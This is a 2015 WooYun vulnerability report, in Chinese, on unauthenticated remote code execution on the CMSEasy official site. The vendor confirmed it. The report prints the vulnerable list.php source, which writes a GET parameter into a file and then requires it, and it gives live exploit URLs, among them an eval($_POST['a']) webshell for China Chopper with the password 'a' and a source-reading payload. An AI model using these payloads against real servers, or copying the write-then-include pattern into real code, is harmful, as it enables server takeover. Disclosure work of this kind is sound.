当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151381

漏洞标题:cmseasy官网无条件getshell

相关厂商:cmseasy

漏洞作者: whynot

提交时间:2015-11-03 15:10

修复时间:2015-12-20 15:18

公开时间:2015-12-20 15:18

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

CMS官网 无条件getshell 想走个大场商 求20rank

详细说明:

首先先看webshell 要不直接把我的webshell给覆盖掉了
菜刀地址
http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29;
密码a

22222222222222222222222.png


漏洞证明:

view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27);

<?php 
/*
*
*文章列表生成文件
*/
if(isset($_GET['list'])){
mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html',"<?php\r\n");
file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND);
fclose($fp);
require 'content_batch_stye.html';}
?>


http://www.cmseasy.cn/post/list.php?list=phpinfo();


QQ20151103-1@2x.png

修复方案:

你们懂

版权声明:转载请注明来源 whynot@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-05 15:17

厂商回复:

谢谢

最新状态:

暂无